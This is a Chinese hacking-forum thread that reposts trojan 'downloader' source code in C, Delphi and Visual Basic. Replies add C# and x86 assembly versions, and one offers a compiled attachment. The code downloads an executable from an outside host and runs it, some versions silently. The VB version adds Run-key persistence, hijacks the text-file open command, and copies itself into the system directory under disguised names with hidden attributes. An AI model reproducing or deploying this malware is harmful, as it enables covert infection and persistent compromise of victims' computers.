‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]三种语言的下载者源代码:C Delphi Vb

eviloctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9833 
精华
769 
积分
40415 
阅读权限
200 
性别
男 
在线时间
3978 小时 
注册时间
2004-7-4 
最后登录
2008-10-11 
楼主 发表于 2007-10-12 14:15  只看该作者

[转载]三种语言的下载者源代码:C Delphi Vb

原始出处:http://www.antcodes.cn/post/17.html
Code Language : C
  1. #include<windows.h>
  2. #include<urlmon.h>
  3. #include<process.h>
  4. #include<Shellapi.h> //这里这个头文件是对ShellExecute的定义
  5. #pragma comment (lib,\"Urlmon.lib\")
  6. int main()
  7. {
  8.     URLDownloadToFile(NULL,\"http://www.lzitw.com/kj/hoho.exe\",\"C:\test.exe\",0,NULL);
  9.    ShellExecute(0,\"open\",\"c:\test.exe\",NULL,NULL,SW_SHOW);
  10.    return 0;
  11. }
Parsed in 0.002 seconds
Code Language : Delphi
  1. //调用API
  2. uses
  3. Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, forms,
  4. Dialogs, StdCtrls, ExtDlgs, ShellAPI;
  5. //调用的API函数
  6. ShellExecute
  7. URLDownloadTofile
  8. //在Delpihi在窗体运行的那个过程(form1.CREAT)里写上
  9. URLDownloadToFile (0, '木马地址', 'c:\蓝梦泽.exe', 0, 0
  10. ShellExecute (0, 'Open', 'c:\fhm.exe', nil, nil, SW_SHOWNORMAL);
Parsed in 0.009 seconds
Code Language : Visual Basic
  1. Private Declare Sub Sleep Lib \"kernel32\" (ByVal dwMilliseconds As Long)'延迟1秒
  2. Private Declare Function URLDownloadToFile Lib \"urlmon\" Alias \"URLDownloadToFileA\" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  3. Private Declare Function GetTempPath Lib \"kernel32\" Alias \"GetTempPathA\" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
  4. Private Declare Function RegCreateKey Lib \"advapi32.dll\" Alias \"RegCreateKeyA\" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
  5. Private Declare Function RegCloseKey Lib \"advapi32.dll\" (ByVal hKey As Long) As Long
  6. Private Declare Function RegSetvalueEx Lib \"advapi32.dll\" Alias \"RegSetvalueExA\" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long     ' Note that if you declare the lpData parameter as String, you must pass it By value.
  7. Const Key_Run = \"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
  8. Const HKEY_LOCAL_MACHINE = &H80000002
  9. Const REG_SZ = 1             ' Unicode nul terminated string
  10. Dim LhKey As Long
  11. Private Declare Function RegOpenKey Lib \"advapi32.dll\" Alias \"RegOpenKeyA\" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
  12. Private Declare Function GetModuleFileName Lib \"kernel32\" Alias \"GetModuleFileNameA\" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
  13. Private Declare Function GetSystemDirectory Lib \"kernel32\" Alias \"GetSystemDirectoryA\" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
  14. Private Sys As String '系统目录
  15. Private US As String '自己
  16. Private Tmp As String '临时文件夹
  17. Private Declare Function FindWindow Lib \"user32\" Alias \"FindWindowA\" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  18. Private Sub form_Load()
  19. On Error Resume Next
  20. Dim RegEdit As Object, Apppath As String
  21.   Dim Cp As String
  22. Dim Ret As Long
  23. Dim sCurrentPath As String, sSystemDir As String
  24. sCurrentPath = App.Path & \"\\" & App.EXEName & \".exe\"
  25. form1.Visible = False
  26. Sys = String(255, 0)
  27. Ret = GetSystemDirectory(Sys, 255)
  28. Sys = Left(Sys, Ret) '获得系统目录
  29. US = String(1024, 0) '获得自己的完整路径
  30. Ret = GetModuleFileName(0, US, 1024)
  31. US = Left(US, InStr(US, Chr(0)) - 1)
  32. Tmp = Temp '获得完整临时目录
  33. If Dir(Sys & \"\\" & \"hoho.exe\") = \"\" Then
  34.     Ret = URLDownloadToFile(0, \"http://www.lzitw.com/kj/hoho.exe\", Sys & \"\hoho.exe\", 0, 0)
  35.    End If
  36. Cp = Sys & \"\system.exe\"
  37. Ret = RegCreateKey(HKEY_LOCAL_MACHINE, Key_Run, LhKey) '写入注册表,以便开机重启
  38. Ret = RegSetvalueEx(LhKey, \"server\", 0&, REG_SZ, ByVal Cp, Len(Cp) + 1)
  39. Ret = RegCloseKey(LhKey)
  40. If InStr(UCase(US), \"INETDBS\") = 0 Then
  41. End If
  42.  Apppath = IIf(Right(App.Path, 1) = \"\\", Left(App.Path, Len(App.Path) - 1), App.Path)
  43.   '取得当前路径,如果是在根目录下就要去掉一个“\\"
  44.   Set RegEdit = CreateObject(\"WScript.Shell\")
  45.   RegEdit.regwrite \"HKEY_CLASSES_ROOT\txtfile\shell\open\command\\", Sys & \"\\" & \"rund1132\" & \".exe %1\"
  46.  On Error Resume Next
  47.   Dim cmd As String
  48.   cmd = Command()
  49.   If cmd <> \"\" Then
  50.     Shell \"NOTEPAD.EXE \" & cmd, vbNormalFocus
  51.   End If
  52. On Error Resume Next
  53. FileCopy sCurrentPath, Sys & \"\System.exe\"
  54. On Error Resume Next
  55. FileCopy sCurrentPath, Sys & \"\\" & \"\rund1132.exe\"
  56. SetAttr Sys & \"\\" & \"\rund1132.exe\", 7
  57. '判断程序是否下在运行
  58. If App.PrevInstance Then
  59. End
  60. End If
  61. Kill Sys & \"\systrsy.exe\"
  62.  Do While Dir(Sys & \"\\" & \"systrsy.exe\") = \"\"
  63.  Ret = URLDownloadToFile(0, \"url\", Sys & \"\systrsy.exe\", 0, 0)
  64.  Call Sleep(100000)
  65. Loop
  66.     Shell Sys & \"\\" & \"systrsy\" & \".exe\", vbNormalFocus
Parsed in 0.076 seconds
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

delphiscn

水静流深

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
138 
精华
6 
积分
3844 
阅读权限
150 
性别
男 
来自
南通 南京 
在线时间
248 小时 
注册时间
2005-2-24 
最后登录
2008-10-12 
沙发 发表于 2008-1-26 15:45  只看该作者
再给个自己写的C#版本的 呵呵
Windows Vista Home Premium
VS 2005
Net 2.0 下编译通过
复制内容到剪贴板
代码:
using System.Runtime.InteropServices;
using System;

class Task
{
  [DllImport("Shell32.dll")]
  public extern static int ShellExecute([MarshalAs(UnmanagedType.LPTStr)] int handle, String lpOperation, String lpFile, String lpParameters, string lpDirectory, int nShowCmd
);
  [DllImport("urlmon.dll")]
  public extern static int URLDownloadToFile([MarshalAs(UnmanagedType.LPTStr)] string pCaller, string szURL, string szFileName, int dwReserved, string lpfnCB
);
  static void AboutCoder()
  {
    Console.Write("+=====================================================+");
    Console.Write("Code BY Delphiscn ([email]Delphiscn@gamil.com[/email]) [url]http://blog.csdn.net/delphiscn[/url]");
    Console.Write("+=====================================================+");
  }

  static void Main()
  {
    //AboutCoder();
    URLDownloadToFile(null, "http://www.lzitw.com/kj/hoho.exe", "C:\\Windows\\System32\\Windll32.exe", 0, null);
    ShellExecute(0, "open", "C:\\Windows\\System32\\Windll32.exe", null, null, 0);
    return;
  }
}

附件

Application.rar (2 KB)

2008-1-26 15:45, 下载次数: 190

Delphiscn Blog
http://blog.csdn.net/delphiscn

TOP

Anskya

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
57 
精华
7 
积分
3805 
阅读权限
200 
在线时间
35 小时 
注册时间
2004-11-17 
最后登录
2008-9-19 
椅子 发表于 2008-2-13 15:18  只看该作者
补上一贴
复制内容到剪贴板
代码:
call @F
db 'UrlDownloadToFileA',0
@@:

call  @F
db 'urlmon.dll',0
@@:
call LoadLibraryA
push eax
call GetProcAddress
mov ebx, eax

sub eax, eax
push eax
push eax
push eax
call @F
db 'C:\xx.exe',0
@@:
call @F
db 'http://www.xxx.com/xx.exe',0
@@:
push eax
call ebx
push eax
call @F
db 'c:\xxx.exe',0
@@:
call WinExec
push byte 0
call ExitProcess

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题